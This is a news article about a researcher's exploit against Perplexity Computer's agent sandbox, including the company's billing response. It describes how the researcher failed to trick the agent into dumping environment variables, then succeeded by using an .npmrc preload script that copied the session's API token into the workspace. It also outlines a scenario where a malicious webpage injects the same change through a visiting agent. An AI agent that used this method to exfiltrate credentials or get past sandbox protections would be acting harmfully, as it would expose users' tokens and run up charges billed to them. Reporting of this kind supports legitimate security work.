Perplexity Computer “Exploit”: Did Someone Really Get Free Access to Claude Opus 4.6?

perplexity

A claim that someone managed to access Claude Opus for free through Perplexity Computer recently spread quickly across AI and cybersecurity communities. The story sounded dramatic: a researcher allegedly extracted a token from the system and used it to run Anthropicโ€™s most powerful model without paying a cent.

But as more details surfaced, the situation turned out to be far more nuanced. The technical discovery is real, yet the conclusion about โ€œunlimited free accessโ€ appears to be misleading.

How the story started?

On March 12, 2026, entrepreneur and startup founder Yousif Astarabadi shared a thread explaining how he investigated the internal behavior of Perplexity Computer, a recently released product that allows AI agents to run code inside a controlled environment known as a sandbox.

The system relies on AI models like Claude to execute commands and interact with software tools in that isolated environment.

While examining how the system worked internally, Astarabadi noticed something intriguing: the runtime environment must contain a credential allowing Claude Code to communicate with Anthropicโ€™s API.

If that credential could be retrieved, it could theoretically be reused outside the sandbox.

Six failed attempts before success

According to the researcherโ€™s own description, extracting the token was not straightforward. Several attempts failed before a working method was discovered.

Initial strategies involved trying to trick the agent into exposing environment variables or running scripts that would reveal internal configuration details. Each time, the systemโ€™s protections detected the attempt and blocked the request.

The breakthrough came from an entirely different angle: the applicationโ€™s startup process.

Claude Code is launched through npm, the widely used JavaScript package manager. When npm starts an application, it automatically reads a configuration file called .npmrc located in the userโ€™s home directory.

That configuration file can contain instructions that alter how the application starts.

The configuration trick that exposed the token

The key discovery involved a specific npm option that allows a JavaScript module to be loaded before the main application executes.

By adding a custom line to the .npmrc file, the researcher was able to ensure that a small script ran immediately when Claude Code started โ€” before many of the security checks took place.

The script itself was simple. It read the environment variables of the running process and copied their contents into a file accessible within the shared workspace.

From there, the token used by Claude to access Anthropicโ€™s API could be retrieved.

The entire process reportedly required only a few commands.

Testing the token outside the sandbox

After extracting the token, the researcher configured it on his own computer and began sending requests to the Claude Opus model.

To verify the effect on billing, he deliberately generated a large number of tokens. Surprisingly, his Perplexity account balance appeared unchanged.

This led to the claim that the costs were being charged to Perplexityโ€™s master account instead of the user.

The implication was dramatic: anyone who could extract the token could theoretically run Claude Opus indefinitely without paying.

Perplexityโ€™s response changes the picture

Shortly after the claim spread, Perplexity addressed the situation publicly.

According to the company, the extracted credential was not a shared API key. Instead, it was a temporary proxy token generated specifically for an individual user session.

That means the token still belongs to the user โ€” and any usage tied to it ultimately gets billed to that userโ€™s account.

The reason the balance did not immediately decrease is reportedly due to asynchronous billing. In other words, charges are processed after the usage occurs rather than instantly.

Perplexity reportedly provided a list of nearly two hundred billing events associated with the tests, confirming that the activity had in fact been recorded.

A real vulnerability โ€” but not free AI

While the sensational claim of unlimited free access appears incorrect, the technical aspect of the discovery remains noteworthy.

The token was successfully extracted from the sandbox environment and reused from an external machine.

That raises an important security question: if a token can function outside the sandbox, could malicious code attempt to capture it automatically?

The researcher suggested a possible scenario where a compromised webpage visited by an AI agent might inject the same configuration modification into the environment. If successful, that could allow an attacker to extract the userโ€™s token and generate usage billed to the victim.

An unanswered security concern

For now, Perplexity has clarified the billing mechanism but has not publicly addressed the broader concern about token exposure beyond the sandbox.

The debate highlights a growing challenge as AI agents gain the ability to run code and interact with external systems. When those agents operate inside complex environments, security boundaries become increasingly important.

Even small configuration details โ€” like the way an application starts โ€” can open unexpected attack paths.

In this case, the story serves as a reminder that in the rapidly evolving AI ecosystem, the line between clever experimentation and genuine vulnerability can sometimes be very thin.

alex morgan
I write about artificial intelligence as it shows up in real life โ€” not in demos or press releases. I focus on how AI changes work, habits, and decision-making once itโ€™s actually used inside tools, teams, and everyday workflows. Most of my reporting looks at second-order effects: what people stop doing, what gets automated quietly, and how responsibility shifts when software starts making decisions for us.